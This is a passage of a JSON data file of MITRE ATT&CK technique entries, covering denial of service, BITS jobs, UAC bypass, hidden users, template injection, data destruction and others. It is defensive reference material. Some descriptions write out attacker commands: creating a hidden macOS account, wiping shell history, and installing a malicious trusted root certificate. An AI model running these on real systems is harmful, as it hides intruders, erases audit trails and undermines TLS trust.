layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nIn cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n\nFor attacks attempting to saturate the providing network, see the Network Denial of Service Technique [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\n\n### OS Exhaustion Flood\nSince operating systems (OSs) are responsible for managing the finite resources on a system, they can be a target for DoS. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018)\n\n#### SYN Flood\nWith SYN floods excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\n#### ACK Flood\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)\n\n### Service Exhaustion Flood\nDifferent network services provided by systems are targeted in different ways to conduct a DoS. Adversaries often target DNS and web servers, but other services have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\n#### Simple HTTP Flood\nA large number of HTTP requests can be issued to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)\n\n#### SSL Renegotiation Attack\nSSL Renegotiation Attacks take advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)\n\n### Application Exhaustion Flood\nWeb applications that sit on top of web server stacks can be targeted for DoS. Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)\n\n### Application or System Exploitation\nSoftware vulnerabilities exist that when exploited can cause an application or system to crash and deny availability to users.(Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.","tactics":["impact"],"externalId":"T1499","externalUrl":"https://attack.mitre.org/techniques/T1499"},"key":"mitre/endpoint-denial-of-service"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Uncommonly Used Port","version":"1.0","description":"Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.","tactics":["command-and-control"],"externalId":"T1065","externalUrl":"https://attack.mitre.org/techniques/T1065"},"key":"mitre/uncommonly-used-port"},{"type":"mitre","subtype":"technique","metadata":{"technique":"BITS Jobs","version":"1.0","description":"Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1086)  (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin)\n\nAdversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016)\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016)","tactics":["defense-evasion","persistence"],"externalId":"T1197","externalUrl":"https://attack.mitre.org/techniques/T1197"},"key":"mitre/bits-jobs"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Bypass User Account Control","version":"1.0","description":"Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)\n\nAnother bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)","tactics":["defense-evasion","privilege-escalation"],"externalId":"T1088","externalUrl":"https://attack.mitre.org/techniques/T1088"},"key":"mitre/bypass-user-account-control"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Runtime Data Manipulation","version":"1.0","description":"Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1042) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.","tactics":["impact"],"externalId":"T1494","externalUrl":"https://attack.mitre.org/techniques/T1494"},"key":"mitre/runtime-data-manipulation"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Transmitted Data Manipulation","version":"1.0","description":"Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.","tactics":["impact"],"externalId":"T1493","externalUrl":"https://attack.mitre.org/techniques/T1493"},"key":"mitre/transmitted-data-manipulation"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data Encoding","version":"1.0","description":"Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64,  MIME, UTF-8, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.","tactics":["command-and-control"],"externalId":"T1132","externalUrl":"https://attack.mitre.org/techniques/T1132"},"key":"mitre/data-encoding"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Resource Hijacking","version":"1.0","description":"Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.","tactics":["impact"],"externalId":"T1496","externalUrl":"https://attack.mitre.org/techniques/T1496"},"key":"mitre/resource-hijacking"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Hidden Users","version":"1.0","description":"Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: sudo dscl . -create /Users/username UniqueID 401 (Citation: Cybereason OSX Pirrit).","tactics":["defense-evasion"],"externalId":"T1147","externalUrl":"https://attack.mitre.org/techniques/T1147"},"key":"mitre/hidden-users"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Compile After Delivery","version":"1.0","description":"Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)","tactics":["defense-evasion"],"externalId":"T1500","externalUrl":"https://attack.mitre.org/techniques/T1500"},"key":"mitre/compile-after-delivery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Compiled HTML File","version":"1.1","description":"Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nAdversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)","tactics":["defense-evasion","execution"],"externalId":"T1223","externalUrl":"https://attack.mitre.org/techniques/T1223"},"key":"mitre/compiled-html-file"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data from Information Repositories","version":"1.0","description":"Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nSpecific common information repositories include:\n\n### Microsoft SharePoint\nFound in many enterprise networks and often used to store and share significant amounts of documentation.\n\n### Atlassian Confluence\nOften found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.","tactics":["collection"],"externalId":"T1213","externalUrl":"https://attack.mitre.org/techniques/T1213"},"key":"mitre/data-from-information-repositories"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Clear Command History","version":"1.0","description":"macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as unset HISTFILE, export HISTFILESIZE=0, history -c, rm ~/.bash_history.","tactics":["defense-evasion"],"externalId":"T1146","externalUrl":"https://attack.mitre.org/techniques/T1146"},"key":"mitre/clear-command-history"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Spearphishing via Service","version":"1.0","description":"Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.","tactics":["initial-access"],"externalId":"T1194","externalUrl":"https://attack.mitre.org/techniques/T1194"},"key":"mitre/spearphishing-via-service"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Hardware Additions","version":"1.0","description":"Computer accessories, computers, or networking hardware may be introduced into a system as a vector to gain execution. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.","tactics":["initial-access"],"externalId":"T1200","externalUrl":"https://attack.mitre.org/techniques/T1200"},"key":"mitre/hardware-additions"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data Destruction","version":"1.0","description":"Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018)","tactics":["impact"],"externalId":"T1485","externalUrl":"https://attack.mitre.org/techniques/T1485"},"key":"mitre/data-destruction"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Install Root Certificate","version":"1.0","description":"Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)","tactics":["defense-evasion"],"externalId":"T1130","externalUrl":"https://attack.mitre.org/techniques/T1130"},"key":"mitre/install-root-certificate"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data Encrypted","version":"1.0","description":"Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.\n\nOther exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)","tactics":["exfiltration"],"externalId":"T1022","externalUrl":"https://attack.mitre.org/techniques/T1022"},"key":"mitre/data-encrypted"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Drive-by Compromise","version":"1.0","description":"A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation.\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring. (Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.","tactics":["initial-access"],"externalId":"T1189","externalUrl":"https://attack.mitre.org/techniques/T1189"},"key":"mitre/drive-by-compromise"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Network Denial of Service","version":"1.0","description":"Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). Many different methods to accomplish such network saturation have been observed, but most fall into two main categories: Direct Network Floods and Reflection Amplification.\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).\n\n###Direct Network Flood###\n\nDirect Network Floods are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for Direct Network Floods. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\n###Reflection Amplification###\n\nAdversaries may amplify the volume of their attack traffic by using Reflection. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)","tactics":["impact"],"externalId":"T1498","externalUrl":"https://attack.mitre.org/techniques/T1498"},"key":"mitre/network-denial-of-service"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Hidden Files and Directories","version":"1.0","description":"To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.\n\n### Windows\n\nUsers can mark specific files as hidden by using the attrib.exe binary. Simply do attrib +h filename to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.\n\n### Linux/Mac\n\nUsers can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: defaults write com.apple.finder AppleShowAllFiles YES, and then relaunch the Finder Application.\n\n### Mac\n\nFiles on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).\nMany applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.","tactics":["defense-evasion","persistence"],"externalId":"T1158","externalUrl":"https://attack.mitre.org/techniques/T1158"},"key":"mitre/hidden-files-and-directories"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Template Injection","version":"1.1","description":"Microsoft’s Open Office XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse this technology to initially conceal malicious code to be executed via documents (i.e. [Scripting](https://attack.mitre.org/techniques/T1064)). Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)","tactics":["defense-evasion"],"externalId":"T1221","externalUrl":"https://attack.mitre.org/techniques/T1221"},"key":"mitre/template-injection"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Access Token Manipulation","version":"1.0","description":"Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas. (Citation: Microsoft runas)\n  \nAdversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system. (Citation: Pentestlab Token Manipulation)\n\nAccess tokens can be leveraged by adversaries through three methods: (Citation: BlackHat Atkinson Winchester Token Manipulation)\n\n**Token Impersonation/Theft** - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.\n\n**Create Process with a Token** - An adversary creates a new access token with DuplicateToken(Ex) and uses it with CreateProcessWithTokenW to create a new process running 